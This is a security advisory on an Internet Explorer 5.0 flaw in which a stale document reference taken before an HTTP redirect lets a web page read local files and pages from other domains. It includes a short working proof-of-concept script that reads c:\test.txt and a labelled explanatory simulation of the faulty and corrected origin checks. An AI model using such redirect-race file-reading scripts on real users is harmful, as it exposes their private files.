COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE 5.0

PROBLEM

    Georgi Guninski found the following.  Internet Explorer 5.0 under
    Windows 95 and NT 4.0 (Windows 98 is presumably vulnerable as well)
    allows a web page to read local text and HTML files, and files from
    any other domain (reading files of other types is probably possible
    too).  Window spoofing is possible.  In some cases it is also
    possible to read files behind a firewall, since the victim's browser
    does the fetching.  This vulnerability may be exploited via an HTML
    email message or a newsgroup posting.

    The problem is something like a race condition immediately after

        window.open("HTTP-redirecting-URL")

    If you do:

        a=window.open("HTTP-redirecting-url");
        b=a.document;

    then "b" is a reference to the new window's document taken while
    the window still belongs to the opener's domain.  When the HTTP
    redirect completes and the window ends up at a local file: URL or
    at a page in another domain, the stale reference keeps working, so
    the redirected URL's document can be read through "b".
    The code is:

    <SCRIPT>
    alert("Create short text file c:\\test.txt and it will be read and shown in a message box");
    // reject.cgi only answers with an HTTP redirect to file://c:/test.txt
    a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
    // take the document reference at once, before the redirect lands
    b=a.document;
    // by the time the timer fires the window shows the local file; the
    // stale reference still reads its contents
    setTimeout("alert(b.body.innerText);",4000);
    </SCRIPT>
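    The model below is an added example, not code from the advisory or
    from Georgi Guninski.  It replays the sequence above in plain
    JavaScript (runs under Node, no browser needed) against two toy
    access checks: one that decides once, when the opener takes the
    document reference, and one that re-checks the opened window's
    current location on every access.  The first reproduces the
    behaviour described for IE 5.0; the second is what a correct
    same-origin check has to do.  The file body "secret local text" and
    the ModelWindow class are constructed for the example.

```javascript
// Added example: a model of the origin check that the advisory describes
// IE 5.0 getting wrong.  Not browser code; a self-contained simulation.

// Origin of a URL: scheme://host[:port] for http(s).  file: URLs and
// anything unparseable get an opaque origin that never equals anything.
function originOf(urlString) {
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return null;
  }
  if (u.protocol === "http:" || u.protocol === "https:") {
    return `${u.protocol}//${u.host}`; // u.host keeps a non-default port
  }
  return null; // opaque origin
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa !== null && oa === ob;
}

// A minimal window: a current location and the text of its document body.
// (Constructed for this example.)
class ModelWindow {
  constructor(url, body) {
    this.location = url;
    this.body = body;
  }
  navigate(url, body) {
    this.location = url;
    this.body = body;
  }
}

// Buggy: the check runs once when the reference is taken, and the object
// handed back keeps working after a redirect moves the window elsewhere.
function buggyGetDocument(openerUrl, win) {
  if (!sameOrigin(openerUrl, win.location)) throw new Error("Permission denied");
  return {
    get innerText() {
      return win.body;
    },
  };
}

// Fixed: the check runs against the window's *current* location every
// time the document is touched, so a redirect revokes access.
function fixedGetDocument(openerUrl, win) {
  return {
    get innerText() {
      if (!sameOrigin(openerUrl, win.location)) throw new Error("Permission denied");
      return win.body;
    },
  };
}

// Replays the advisory's steps: the demo page on www.nat.bg opens the
// redirecting CGI URL, grabs a.document immediately, then the HTTP
// redirect lands on file://c:/test.txt.  Returns what the delayed
// alert(b.body.innerText) would show.
function replay(getDocument) {
  const opener = "http://www.nat.bg/~joro/msredir1.html";
  const a = new ModelWindow("http://www.nat.bg/~joro/reject.cgi?test.txt", "");
  const b = getDocument(opener, a); // captured before the redirect
  a.navigate("file://c:/test.txt", "secret local text"); // redirect completes
  try {
    return b.innerText;
  } catch (e) {
    return e.message;
  }
}

console.log("buggy check:", replay(buggyGetDocument));
console.log("fixed check:", replay(fixedGetDocument));
```

    The point the replay makes is that the reference itself is not the
    problem; holding a handle to a window you opened is normal.  What
    must not happen is a permission decision that survives a navigation
    of that window to a different origin.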

    Demonstration is available at

        http://www.nat.bg/~joro/msredir1.html

    Credit  goes  to  Shane  Hird  from  Australia  for helping Georgi
    discover this vulnerability.

SOLUTION

    Disable Active Scripting (Internet Options, Security, Custom Level)
    for the Internet zone, and for whichever zone your mail and news
    reader renders HTML content in, since the bug is also reachable
    from HTML email and newsgroup postings.